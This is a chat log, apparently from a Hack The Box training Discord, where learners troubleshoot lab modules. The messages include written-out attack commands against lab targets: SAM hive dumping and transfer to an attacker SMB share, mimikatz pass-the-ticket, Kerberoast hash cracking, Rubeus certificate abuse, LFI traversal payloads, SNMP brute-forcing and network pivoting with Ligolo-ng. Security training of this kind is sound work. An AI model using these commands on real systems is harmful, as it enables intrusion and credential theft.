#modules
Huh?
"any linux users here" is a very broad question if you're looking for a specific answer
read the link, it's actually informative
Also is Kali Linux a good website or just for the hackers who aren't working for cybersec
Kali is a linux distro not a site. It's for anyone but has lots of tools built in for people who are interested in this stuff. I would probably do some beginner Linux courses/modules and get a feel for it.
Kali is a pentest driven distro
but at its core, it's debian based - meaning any tool that can be installed on any other Debian Distro will install on any other one
Home of Kali Linux, an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.
See?
that's the official one
.
yeah and kalilinux just redirects to kali.org
it's still a distro
:) that's just the official website of the distro
Also is Kali Linux for both the hackers aka white hat hackers who are cybersec and black hat hackers who are, yk, unethical hackers
Parrot Security website
the site is just where you would go read about kali and download it
it's for anyone
¯\_(ツ)_/¯
there's no restrictions based on what "type" of hacker someone is
Anyone ?
it doesn't matter ¯\_(ツ)_/¯
i suggest you do the infosec fundamentals module
the tools exist for those that know/learn how to use them
path*
I'm not there yet but try to use one of the many cracking sites or a new word list? No idea as I have not done this part yet. Is it saying to crack the hash? Could be that you need to pth or something?
Also since I am new , what can we really do in HTB? Just training , that's it? We can't participate in real life stuffs?
What's ctf?
but as far as "real life" if you're referring to 'hacking a company' or doing a bug bounty then you have to follow that company's Bounty program
every company lays out scopes of bounties differently
but if you're just trying to learn how to hack your neighbours wifi, your frame of mind is too small
Yes i tried to pth also, not working...
Nah I mean I wanna compete
I wanna compete with people who try to hack others and stuff
CTF events are where people compete for the most part. Start slow and get the foundations. Stay consistent; it will take a while to get to that level.
I don't have a pc nor a laptop so, maybe next year
It would be hard to study without that. You can still keep up with cyber sec news and watch vids until you can get a pc
Hmm
buying a cheap laptop and installing a linux distro directly on it is one way to start
~$200 laptops will get you pretty far for cheap
Seems like it, I can't log in
some people are using stuff that's like ~10 years old
yep lookin like @urban sage broke academy 
To add to this I have sold hundreds of old company laptops on ebay for $100 in the past so you could look there
yep; usually when companies cycle through their laptops they'll resell the old ones for a fairly decent price
because it's usually ~4 years old
at least if they're buying through Dell, due to warranty type stuff
i.e. cheaper to buy a new set of systems with warranties than to renew warranty for only up to another year or two of hardware support
¯\_(ツ)_/¯
Guys anybody know where the actual wordlist is in the seclists-master
i mean SecLists has a bunch of different wordlists categorized
the "Ligolo-ng" doesn't work as well in that specific double-pivoting (Dante-lab)
I want to brute force on web directory so which file is that ?
Why ? Haven't tested, but if you have 2 tunnel devices, and proper routing, should work
maybe this one?
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt
right, should
https://systemweakness.com/pivoting-for-newbies-with-ligolo-ng-82f13040aa39
https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5
https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740
This is basically a walkthrough in how to use my favorite tool for lateral movement and network pivoting.
Let’s talk about pivoting in the context of ethical hacking. In the simplest of terms, pivoting entails moving deeper into a network that…
On my journey to take on the OSCP I learned that pivoting/tunneling can be a confusing concept at first for beginners. After doing…
none did the trick
sudo ip tuntap add user kali mode tun ligolo
sudo ip tuntap add user kali mode tun ligolo2
sudo ip link set ligolo up
sudo ip link set ligolo2 up
sudo ip route add 172.16.6.0/24 dev ligolo
sudo ip route add 172.16.7.0/24 dev ligolo2
sudo ./proxylin64 -selfcert -laddr 0.0.0.0:4444
sudo ./proxylin64 -selfcert -laddr 0.0.0.0:4445
In 2nd ligolo, use "start --tun ligolo2"
that's theory 🙂
also you need to add a listener on ligolo1 session
yes
followed :
https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5
I probably have broken something today but it wasn't Academy I swear.
Hey has anyone completed the Introduction to Windows Command Line?
i tried to enumerate the whole community chain but nothing in the output: https://academy.hackthebox.com/module/112/section/1080
can you ping this IP ? Seems connectivity issues
yes, it works
that’s because you have the wrong community string
i brute force the community string but nothing
Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.
Why I had to use this command to make this work, can someone explain.
psexec.py FREIGHTLOGISTICS.LOCAL/sapsso@academy-ea-dc03.inlanefreight.local -target-ip 172.16.5.238
instead of this psexec.py FREIGHTLOGISTICS.LOCAL/sappso@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -target-ip 172.16.5.238
Question says to connect to freightlogistics.local
try the tool onesixtyone
anyone mind helping a noob lol. I connected the vpn and everything and was able to start up a machine but then when i ping the ip I get no connection. Anybody know why?
What issue are you having?
ran agent.exe -connect <MY_IP>:11601 -ignore-cert
got session on my attack host
also I didn't open a listener ...
on the first agent ...
since both of the host R on the same network...
Trying to go to the second network that only one of the host can go there
Tbh haven't gotten this error before, might have something to do with the latest release, if you've got two connections going, can you switch between them with session?
yes
but can't start the second one
You might need to stop the tunnel you've got running to start the new one
can I dm you about it, if you've done it? I am just having a hard time how to exploit the CORS header. the endpoints in the lab don't make sense with the walkthrough and I am already still a little confused on CORS after reading extra material.
but then I'm closing the access to the second host, since the first one is my ticket to the internal network
The agent won't disconnect iirc
then I'm not sure how to close the tunneling that u mean...
You pick your session, then type start right? It writes "starting tunnel to...", there's also a stop command
Try that, experiment a little, or try running the 2nd agent through a listener on the first one (think it was what I was doing in the guide)
I should also check out the newest release to see whether anything else has changed, apart from being able to do port forwarding now
Yes, but go and eat something first.
I've finished the section, but not the whole module yet
sounds good, thanks
the listener method didn't work as well ...
@umbral fulcrum Might be some firewall restrictions in place, you can run ligolo on a different port than the default with -laddr as shown here (your best bets are ports like 80, 443, 445), try that, but you can also create a 2nd ligolo interface again as shown by bmigette
It's super flexible, all the guides including mine cover the basics, but there's a lot you can fine-tune
thanks for everything guys !
Hi, I’m in the 8th question of the second skill assessment in Active Directory Enumeration & Attacks .
the question is :
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
apparently i have to pass the hash and i feel confident that i have tried more than 7 or 8 pass the hash techniques but none of them worked . i already have the hash of the Administrator account but it just does not work . any help would be appreciated
i have an issue with evil-winrm but i can not find the solution on the HTB forums nor on google .
ok, messaged you.
nothing works
don't know what else is there...
there R 2 options left either I missed something critical (don't know where else to look)
OR
the option for "ligolo-ng" isn't possible against the target (not likely)
Anyone can help me with the File Inclusion assessment ? I managed to get the source of index.php page, but then i'm stuck 😄
Check my messages from earlier this afternoon 😉
What "issue"
thanks
Hi everyone, I'm on the password module, and in particular in the module: ''attacking sam'', now I execute these commands, as described in the module:
reg.exe save hklm\sam C:\sam.save
I do the same with system and security
after which I open the smb server with the command said in the module:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
after that, when from the windows terminal I go with move sam.save \\10.10.15.16\CompData it tells me
access denied, 0 files moved,
where is the problem??? Can anyone help me please?
can not connect . more specifically, the error message, Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError . i also ran it with ruby 2.7 in another machine but still nothing
Also remember the user hash is the NT part of the NTLM_V2 hash
i dumped the hash with mimikatz its only one hash
It says this is the wrong answer but this is the result I got from both nmap -sC -sV and after connecting to the server anonymously
When in doubt, enumerate your hashes again
Is there a specific way that the module wants the answer formatted or something?
what mimikatz command did you use
220 is a status code
think about me please ❤️
No
Right but it says the whole banner. Plus I also tried submitting "FTP V1,1" and it still didn't work
lsadump::lsa /inject
marciel thank you, you are very helpful bro
You're so close
220 is the only thing you can ignore in that response
Try logonpasswords and see what you can find
Not sure what this does, but does not seem to extract hashes. Check my message about mimikatz 😉
"220 is a status code" It finally clicked after you said that lol thank you for the tip
okay
I'd recommend deleting the screenshots as they're a spoiler
help about what?
i tried logon passwords . nothing
will do now
i dont understand why win tell me access denied, what i can do?
move c:\sam.save \\10.10.15.16\CompData
understand the command and its parameters
once you've done that, it will instantaneously click what you are doing wrong
I did this, and it gives me the same answer.
Do you have access to save in c:\?
yet the form is clear, it says to create a copy of sam, etc. open the smb server and transfer the files, I don't understand why it tells me access denied,
Also is 10.10.15.16 your tun0 ip?
its literally the same ip as the course
I didn't check
yes, I also tried to copy and paste the files from two machines but it won't let me
I'm doing the Thick Client attacks module right now and can't seem to open PowerShell at all, and this is preventing me from running the relevant script to create the exe I need to debug. Is this intended? I have restarted the machine and it didn't seem to fix anything
Did you read my previous message
You need to use your tun0 ip
obviously for reasons related to people's trust I didn't put my IP
but in the command I put my IP
ah ok
then you can say {my_ip} ¯\_(ツ)_/¯
sorry
Because we have seen a fair share of people be dumb
I took it for granted that I don't put my IP online, especially in a group full of hackers
¯\_(ツ)_/¯
Use other file transfer methods maybe
like which one?
Xfreerdp for instance allows you to mount a directory with /drive:
did you also update the /home/ltnbob/Documents/
since that is as default as well
same as course
but do I have to create these folders??
no
ah ok
you can do this instead to make it easier and check
Try moving the same.save to another folder the user has access to
Hey HTB team, when you guys are going to create a detailed module on Curl?
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData ./
see if that works. using the move cmd with your ip
just one moment
the last command you used for impacket-smbserver was telling the smb to be hosted in that directory. But you probably pointed to a non existent one which wouldnt work
this command does not work
However, I don't copy and paste commands like that, I use some tools that explain to me in detail what they do and how they work, in other words I study them
then if I don't understand it's obvious that I ask for information
missing a space between CompData and ./
You forgot the space after CompData
I want hacks, does anyone know some good ones
now I try to transfer the files to the desktop and try move again. anyway I google before asking, I hate asking because I find arrogant people like you who don't help anything. Only when I don't find what I'm looking for, I use this platform
ok sorry, now it works
thanks man . worked
Wasn't referring to you dude
I was replying to the dude asking for "hack's"

ok sorry man, i hate when i ask for help and people joke about me
Nah your issue seemed legit, we just didn't have enough context at first to confirm what part was the issue
anyway that xfreerdp closes every two seconds, I'm trying to do and vi day friends
no problem. The /home/USERNAME/Documents is a path for a specific user. Sometimes something small like that can ruin everything. Nothing wrong with asking for help just make sure we are provided with enough information to help 🙂
If you have RDP, I'd go with MS RDP client and just copy / paste the file this way 🙂
Maybe, I Never used xfreerdp, I usually do a tunnel like that ssh -L 3390:172.16.7.50:3389 babadmin@192.168.1.66 and then RDP from my windows box to the lab vm (127.0.0.1:3390 in this case). That is what I found to be easiest for me 🙂
yeah. A nice trick to use ssh dynamic port forwarding instead. This way you can use proxychains to execute within the same internal network as the "ssh" party
i usually do something like this for rdp
ssh user@ip -D 9050
proxychains xfreerdp /v:host /u:user /p:password /drive:linux,/home/user/
Since by default proxychains goes over the port 9050
the module said to use xfreerdp, that's why I'm using it, however it's going very slow, so I'm taking a long time to give you an output
yup
Use the tcp vpn download
^
Or change regions (still use the tcp)
i dont use parrot by htb, i use my kali
OK?
That doesn't really matter for the vpn. Sometimes the node is unstable so changing the region helps
it tells me ''the network path was not found''
ah ok, good to know
I didn't solve anything 😦
Changing vpn region you'd need to reset the target btw
i haven't changed anything right now, must i do it?
Might need to uncomment the proxy mode line for it.
it end with CompData
Add a \ after CompData
Hello everyone, I’m new here, completely new to this world. So knew I’m having trouble figuring out a password issue on the first question on operating systems fundamentals 🤦🏽♂️ is there anyone that might be able to help me figure it out? It’s embarrassing, it’s a tier 0 module.
What's the issue exactly
If it's that the password isn't displayed while typing: that's normal
It’s on Linux, I’m doing an ssh and I have the username and ip, the password is provided but it keeps denying me access
C:\Users\bob\Desktop>move sam.save \\ip\CompData
The network path was not found.
Took me about an hour to figure that out lol
You need to do ctrl-shift-v to paste in linux terminal
Thank you, I’ll try that. Also the password provided is written in red, does that mean anything?
No.
🙏🏼 thank you
It's just to differentiate it from the username
I was going nuts, thought it was some kinda riddle
ok guys, I have to go, I'll try again tomorrow to do more tests, in any case if I can't write here, ''thanks for the help''
I had the same issues in the AD lab yesterday. I spent a good hour trying to understand that. What I noticed is that to use an smb share in windows, you might need to do net use \\xxxx\yyy first, or even map it as a net drive via net use x: \\xxxx\yyy.
Also, depending your reverse shell, it might not show the error output (does not seem to be your case tho)
In the end got fed up and uploaded nc.exe on windows device and used netcat to get files I needed
This is a direct rdp session
Anyone here who speaks Spanish?
English only #rules
Ok
hi guys im on password attacks kerberos::ptt "C:\tools\[0;58e1a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi" it says ok it did it then i exit and go to powershell but it still hasn't changed?
guys can someone help me here? "Using metasploit framework" module Sessions & jobs
tried to use the exploit
and got a TTY shell
u shud look for diff exploit
I got a TTY shell and tried privesc
I tried the php one but its not vulnerable
hi
kinda stuck on the footprinting hard lab
got to "see" some stuff from SNMP, but nth more
Hey all, got a question on a technique learned from the windows module. I'm attempting to use the PSUpload.ps1 script to upload a file to my attack machine, but am getting hit with errors. Not sure if I am invoking the script directly:
why doesnt this work [18:17:13:676] [1845:1846] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:17:13:676] [1845:1846] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:17:13:676] [1845:1846] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[18:17:13:676] [1845:1846] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
i tried to freerdp password attacks, i had it then it randomly exited
Just want to say thank you, I was able to complete that section thanks to your help.
Ahh, i was invoking it wrong after all, geez
. ./script.ps1, for those that have invoking issues in the future LOL

you have to wait a little bit for the snmp output to show you the next step 😉
my target spawn is taking forever to load?
i don’t think i understand your question
iso is the root oid followed by the sub oids 3. … and their corresponding values
iirc
i meant that when i did 1.* i didnt get anything but 1.2.* gave me "stuff"
Hey any PowerShell experts willing to help a noob?
i recommend not specifying an oid it’ll query the snmp mib from the starting point
as snmpwalk does not support regex for oid query
can u explain pls?
so u mean when bruteforcing it, if we didnt specify and oid it would start from the beginning anyway?
yes think of it like querying the entire snmp tree on the device 😉
cant get past the footprinting medium module
i just finished
i can't get rdp in
literally just submitted the hard lab flag
lets go
try using TCP vpn file
bet
it worked for me
yup taking forever
I use eu servers and it works fine
nope still not working
i think im not qualified enough to answer such question 😅 😂
toolkit? just use the right tool for the system, there's no set tool to use, other than nmap I guess
[18:40:12:501] [10741:10742] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:40:12:502] [10741:10742] [WARN][com.freerdp.crypto] - CN = WINMEDIUM
[18:40:12:706] [10741:10742] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:40:12:707] [10741:10742] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:40:12:707] [10741:10742] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[18:40:12:707] [10741:10742] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
looks like your creds are wrong
^
Single quotes
it prolly has ! which is causing linux shell to do some stuff
wrap in three ` next time 
Double quotes can still be interpreted
oh
+1 pls 😂
i tried still nothing
i pass the ticket in password attacks but kerberos::ptt "C:\tools\[0;5a1ef]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi" it says file ok then i go check whoami im still admin??
$ is a variable call
! is history
This looks weird to me imo but could be formatting in discord
yeah but why " " get interpreted?
Single quotes are string literal
Meaning it doesn't attempt to interpret it as anything but text
o i c its double quote
You can still pass commands and variables through double quotes
thanks 
i use it to become john, i do it and it says file ok then i exit mimikatz but i'm still the same person
When you launch a shell using the mimikatz method you should be able to access the share
regarding the linux priv escalation module: my user has one of the env path dirs writable by us and root is running awk every 3 minutes without the absolute path. can i write awk inside this dir so when root executes awk i can get a reverse shell as root?
xfreerdp?
yea
what's the full rdp command? and module and section
that's why i hate doing exams, the stuff that is taught in the class doesn't work
stop getting frustrated its okay
xfreerdp /u: /p: /v:
Try putting /v: first?
no difference i think
Or try using remmina
Sometimes it's stupid
yeah that could work ig
what module and section?
What creds are u using
remmina didnt work either
anyway, good night everyone im dying here 😂
good night bro
and good luck bro, hope it works
thanks bro
That’s not the correct pass
how do you know what module and section it is
can't remember an alex user
try not to connect using /p:___ and just manually input the pass
footprinting module
So it has nothing to do with stuff in the class not working, or it only working for everyone else 🤷🏼♂️
when it ask
Footprinting medium
i tried adding the !mD and it wont work still
Footprinting medium. Alex, mssql
Wrap it in single quotes
Single quotes
The password
^
ah it's been a while since that module 
server hostname was not specified with /v:server port
Then you should specify
error: server hostname was not specified with /v:<server>[:port]
You don't need to add port btw
Just put the ip
Considering its default
What’s your command
Space between ' and /
Lmao immediately for both of us
This has nothing to do with Linux
Delete the command here: spoiler

Has nothing to do with linux, you just missed something
If I keep trying to log in with the wrong password on windows it won’t work either
So read instead of rush😄
Does anyone know how to do this task in the introduction to windows command line?????
"For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them."
Being case sensitive reduces mistakes
Authenticate to the 10.129.x.x target, then from there ssh to 172.16.5.155
how do I find the username of the DC?
Thank you so much
Critical thinking hurts the brain
Lol I have been working on this module for 3 days staring at the same terminal messes me up XD
Engaging braincells can be difficult lol
First you need the right permissions
i got admin already
👍
Just click around
Otherwise you can look up mssql commands (attacking common services goes over more of the command line stuff)
Just gotta literally click around until you find the table
Then "view last 200 entries" or sth like that
it takes maybe a few minutes of clicking ¯\_(ツ)_/¯
where i clicked up and down the whole list
Expanding sections/databases helps
been doing that too looked up accounts creds databases etc nothing
it definitely exists ¯\_(ツ)_/¯
Take a step away and come back to it in a bit
I think part of your current frustration has something to do with the rdp stuff earlier getting to you a bit. And wanting to just be done
or you can just write a simple query to grab the flag, no need for manual digging
That too, simple queries aren't taught in footprinting unfortunately
But easy to find on google
i can't find it between SQL sucks ass and my Kali VM freezing for no reason whatsoever
Could be the vpn being dumb if you ping the machine what's the avg response time?
nah like my entire kali vm freezes all the time for no reason at all
^
That's actually a legit thing 17.5 is dumb as fuck
Are you also dedicating enough resources to the vm
Bc a vm doesn't just freeze up "for no reason"
What version are you currently using
its running 15.x rn
why not just go back to 17.0.2 instead of 15?
where do you enter those config changes? i have never gone into the config file before
17.0.2 isn't an option for me, just 16.2
the vmx file in the vm folder
what
why can't you downgrade? just uninstall 17.5 and install 17.0.2
i got the pro version idk if that means anything
so do I
i can just change the hardware compatibility and thats it right?
im not a VM master lol
yep
whatever you can spare 
Safest allocation is 50% of host, but it depends on setup
8GB of ram and 1-2 cores tends to be fine
Hey @proud pine quick question, did you compile ligolo. Or just use the precompiled binaries
I decided to step back and do Academy. I'm doing a Linux Fundamental module and am currently stuck on something. When doing a module that required SSH I used the sudo su command attempting to locate a directory and a notification came up that has me concerned. "This incident will be reported"
Realistically speaking how long will it take to make it all the way to Dante? Assuming that I don't have a job and nothing but free time?
depends on your skill level
Okay, just wanted to make sure I wasn't gonna get banned for accidentally breaking a rule
I'm supposed to be finding a path to a directory and I thought I'd have to reach its root to find it
My skill level is 18% on the penetration testing path for cpts, 64% on the CompTIA PenTest+ in TryHackMe
that.. doesn't mean anything to me, the individual boxes on dante are similar to easy on the main platform
I'd even say the easy boxes now are a bit harder than dante
Geez, was starting to feel really stupid that I couldn't progress, and I feel even stupider for not trying the env command
holy hell pwnbox is freezing all of a sudden
You seem pretty knowledgeable what is your power level?
check season 3 leaderboard ig
also you can ask what people feel about it in #prolabs-dante
Refresh the page
I completed the module. But considering I can only use Pwnbox one time per day, am I limited to using my own computer's terminals for further modules?
There's a whole Setting Up module too
how 🙃
spend every weekend doing a box
@next bronze I have acquired ligolo now time to shenanigan
well.. I'm sure it's amazing, but how do I check the leaderboard
7th huh
nice, the new update is sick, multiple tunnels now, makes double pivot much easier
Ye just going through the pivoting module to check it out lol
can you use your rewards to buy cubes, or platinum?
Or is that only for silver/gold?
for academy it's annual plans only, which are useless to me
I'll just get a free month of prolab
what's the level of box you need to be comfortable with to pass cpts
skills in boxes don't translate to the exam
there are many things you need to do in cpts which you won't find in boxes: networked environment, postex enum, lateral movement, etc
yeah the exam is more like a prolab, but what does it take to solve medium/hard machines?
research, perseverance, headbang against the box 
so you don't need a crazy knowledge
knowledge comes from researching, if you already know them then it's a lot easier
okay , I got you
Hey @next bronze you've used ligolo a bit yeah? I'm having a hard time adding the 172.x.x.x interface (invalid prefix) 
the ip route add command?
Ya
it needs to be the first ip of the subnet, e.g 172.16.7.0/24 works, but not 172.16.7.10/24
Yeah this subnet is 172.16.5.129/23 on the ifconfig
So I think I'm just stupid
ah use /24 would be easier, so 172.16.5.0/24, if it's /23 then it should be 172.16.4.0/23
I swear I tried that 

got it?
I am doing a final lab on LFI.
I have found two parameters. The parameter page in the link http://83.136.253.251:36016/index.php?page=about is suspicious. I could not bypass the filter that is filtering .., directory traversal, and is appending .php. Though I can see the code of index.php by putting the value of page=php://filter/convert.base64-encode/resource=index
Second, I have another link on the same website; http://83.136.253.251:36016/ilf_admin/index.php?log=../../../../../../../../../../../../../../etc/passwd. As you can see, I can do directory traversal and can see the content of /etc/passwd, however I can not read index.php file source code by using php://filter/convert.base64-encode/resource=index.php. I also tried different variants... e.g php://filter/convert.base64-encode/resource=lfi_admin/index.php. Can you explain why??? underlying webserver is nginx.
I actually didn't use ligolo at all.
Though, if you want to try the method I used, shoot me a ping and I can hook you up.
I always compile golang tools
I'm just testing it out in the pivoting module
So far it's a bit of work however it's a lot smoother
I made a little 3 line shell script that takes a network as an argument and does all the ligolo device and route setup
Hi!! Currently into adcs training... in trouble with the esc4 exercise, im not able to get molly's file... tried with cifs tgs from rubeus from administrator and molly. Tried some other altservice.... cant figure out what i do wrong.
Got access to molly ntlm and administrator ntlm too
if you have the admin hash you can get the last question
if that's what you're stuck on
But should i be able to get the file with the tgt and tgs from the administrator certificate gained from abusing esc4
Or... i must ask another tgt/tgs with that ntlm using rc4
I'm not sure what you're asking. if you used Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /getcredentials, you will get the admin's hash, then just pth
oh i get it,you can use Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /ptt to inject the ticket into your current session, then you can get the last flag that way
is anyone that has completed the skills assessment 2 for Deserialization intro able to give me a nudge? 3 days on this and starting to go crazy.
in the section ACL Abuse Tactics of ACTIVE DIRECTORY ENUMERATION & ATTACKS module what is the password file to crack adunn? rockyou?
I believe that's what I used
thanks, it just doesn't want to crack for me
maybe I have an option wrong? hashcat -m 13100 rubeus_adunn.txt -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable -o cracked.txt
wrong attack mode, 0 for wordlist
core attack modes
hashcat -m 13100 rubeus_adunn.txt -a 0 /usr/share/wordlists/rockyou.txt --force --potfile-disable -o cracked.txt
You don't need to disable potfile btw for output
hashcat -m 13100 rubeus_adunn.txt -a 0 /usr/share/wordlists/rockyou.txt -o cracked.txt
That should work
Also fwiw one of the main devs has said: never use --force
great thanks, firing the lab back up
much success!
Hey, anyone had trouble with the last question on the Windows Command Line module assessment?
I have piped and done the command
but every user I put in in relation to the 6425 EventID doesn't work
Now I'm stuck on Footprinting hard
Read the engagement closely and look at udp
i got the udp already
idk what to do now
I ran snmpwalk and the other one
onesixtyone
Well if you don't know the community string, you should probably look for that first
I got a string with nmap
And onesixtyone will definitely output it
all it gave me was a banner
braa doesn't work for me for some reason
What's your braa command
snmpwalk gave me the best output: timeout, no response
braa walk /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings@10.129.202.20
Bruh
i tried it without walk too
Why are you throwing the whole list at it
If you properly enumerated it, you'd have the string :)
is this what it looks like? 5b99e75a10288b6100000000
No
welp
The community string is a plaintext string
onesixtyone will give you the answer
ip [string] blah blah blah
hit it with another nmap scan?
No
You already have your start
Use tools that are at your disposal, this is literally the foothold lol
yea I'm lost, I just tried onesixtyone and nothing happened 🤦♂️
What is your onesixtyone command?
onesixtyone -i
? Why i
My brother in Christ
Read the snmp section
yea i was throwing the list at it
i is for a file with a list of hosts
it says -c
Yep and it gives you a pretty good wordlist to use
it said it couldn't find that file
I keep confusing SNMP with SMTP for some reason. Always jump to mail lol
Then that file might not be in that location
locate SecLists
Or locate snmp.txt
It probably mentions that somewhere
yee
but ik, like most sections that reference SecLists, it has a link ¯\_(ツ)_/¯
Then use that file path of where your SecLists is
Screenshot now, show it
What's the output
nvm this list gave me nothing
Bc I can 99% guarantee you overlooked the onesixtyone output
Screenshot of the output: now
That list seems small but that's not the full output is it?
Wrong wordlist
Ah
Yep that'll be the one
tf am I gonna do with this
...
So you know how the examples use "public"
Use your braincells to connect the dots
they have left the building
OK so. If the examples use "public" but you have a different word
Literally the word In The Brackets
Anyone please DM me for help. I have got in, I don't want to post the command, but I have multiple users coming up
As I pointed out earlier
Gonna need to be specific, m8: what module and section?
introduction to windows command line
last question in assessment
with eventID log
4625
Don't narrow your output to users that just exist on the system
I tried every user already
@fathom pendant how many modules have you done lol
Attackers don't always know what users exist
I put in private and get a gigantic list of random names
Not enough, I'm forcing myself now to actually finish ad enum
I guess if you focus on a lot of certs, you do a loooooot
why are you using "private"
The string you're looking for is staring you straight in the face
Well, public gave me a useless banner
@winter arrow what is the response of the tool? What is the question for your task?
Evaluate the onesixtyone output that didn't just give you nothing
Look very closely at it
Stare at it until it clicks
Reread the engagement paragraph for this assessment if you have to
Yeah I have the full output for event 4625 in term
Then I even RDP'd into the event logger
it might be time for another adderall
no luck
Don't abuse substances
if you are on adderall you prob just need sleep
I'll give you another hint [b..p]
yea tru
Get some rest and maybe it'll click in the morning
Not worth getting points if you're not going to remember it the day after
now there is nothing there
Has anyone done this?
@severe eagle sorry, I haven't done that module
Intro to Windows Command Line; who can give me a hint?
I told you. You need to look at all the outputs
yeah I have been
Don't filter any names out of it
for about 3 hours now before coming on here
Are you running the command on the DC?
now from user10
Okay, I finally got an output but idk what now
The username starts with j
thank you
You mean output from braa or snmpwalk?
no just onesixtyone
Ok
because VMware decided to be funny and freeze again
Now the word is between the []
okay i see it now
Good 👍
now what?
Now use either braa or snmpwalk with that string instead of "public" from the examples
And you'll get an output of a command that looks like it could be creds
Now I get "error opening community file name"
vmware keyboard stuck again hang on
Show your command
to get the message which user
Are you running that on the domain controller?
Na, will connect now and try
Y'all got to remember, if you don't show commands or errors it's like sending a message to a mechanic saying "why doesn't my car start". We have no debugging information to help, and we don't have access to your "car"/terminal
Yup. Command didn't look wrong, so they were just looking in the wrong place
Read the section again, and refrain from posting spoilers about the exercises please
@winter arrow onesixtyone is for finding strings, braa or snmpwalk from here
I suggest taking a break tbh
Hi sirg I'm just redoing modules for the 10000th time xD
(I'm just waiting on a thing to run in ad enum)
Got Ligolo set up, works seamlessly
Pretty good tbh, and seamless. Practiced on the pivoting module to get used to it. Doesn't require any elevated privileges to use
That's nice. I feel like it's going to make tunneling so much better, especially when you have like 2-3 networks to pivot into
Might f around and learn go to make switching between initiated sessions easier
Okay, now what? I got the string
Honestly go re-read the snmp section
And maybe update notes if you're taking any
well, reread the question at least
This is the hard skills assessment
It combines a handful of things from the module to get the answer
If you read the section regarding snmp the next step is pretty straightforward
yea, that's what I thought too, I thought it was rwcommunity
ah alr. But I mean, hard or hard, it's going to be in the module regardless. If it's about SNMP it's probably going to be in the SNMP section
which module is this?
it’s really not that complicated 
I tend to overthink things sometimes, I think
that's one of the many reasons I love the autorecon plugin, but hopefully it'll get more developed
Autorecon is a crutch
You should be able to manually verify automated results for false positives
Still. Knowing how it works is important
Auto tools are nice once you grasp the manual concept
I often find that reporting vulnerabilities needs confirmation to be done manually anyway, so
All you gotta do is replace a word from the example commands given
just says command not found
apparently rwcommunity doesn't exist for me 🤦♂️
Never used rwcommunity
that's what the page was saying
? The only tools I saw showcased were braa, onesixtyone, and snmpwalk
rwcommunity is a setting in snmp
It's not a tool
welp, I give up
Just scroll further down from rwcommunity lol
The subsection
Footprinting the Service
SNMPWalk
braa
braa wouldn't work for me
unable to process queries invalid syntax
It helps if you show us your command
I'll delete it after
Bruh
Why are you convinced that NM is the comm string
Also it looks like you got that potentially from snmpwalk?
braa b*@<ip>:.1.3.6.*
(b* should be obvious) once you get the interesting script output: maybe evaluate what other ports are open
still invalid
no the brackets are gone
No spaces between the community string and the @ sign
yep no spaces
Copy paste from your terminal, to this chat
the stars stay right?
No
b* was a replacement for the community string that onesixtyone gave you
To not spoil it
Now it's an invalid query
The :.1.3.6.* goes directly after the ip
I got it to run, missed a .
Now: this output should be interesting
looks like the same output from the last tool
Snmpwalk? Yes
yea
They essentially do the same thing: you didn't say you did snmpwalk
(I inferred bc you had the user password in your copy/paste)
Now look at other running services and see how you can use those creds
I tried SSH but no luck
maybe other services will be more useful ¯\_(ツ)_/¯
Return to enumerating ports
Also refer back to the engagement brief: you're told directly that this is a mail server
(MX, mail exchange)
yep still nothing
The output gave you a username and password
There's mail services running that you can try those creds against
The .sh? How do I download it?
The output of the .sh file is in the braa output
Sounds like snmp
Hard lab of footprinting
Hello, I'm currently doing Attacking Common Services - Medium. I heard that I'm supposed to get 6 open ports; I have been resetting the box but always get like 4/5 open ports
Ah, this was fun
might take a few resets
Give it a few minutes before scanning as well
Some services take a bit to start up
Do I need to perform a full port scan with -p- or can I just do nmap -sCV?
-p- is useful to be sure
this is aids
gt, will give it a go after resetting it 🙂
Your enumeration is just bad
You have all the info available for the next steps
In fact you had the password copied at one point
I'm trying to crack it with hashcat
Why?
No need
I think he's talking about the private key?
You find that through enumeration using those creds
I saw the password next to the name
Mhm
At what point is he rn?
Barely past snmp
||Openssl+imaps||
His enum needs work
I need to get it automated
Automating won't help you learn
Nmap is automated
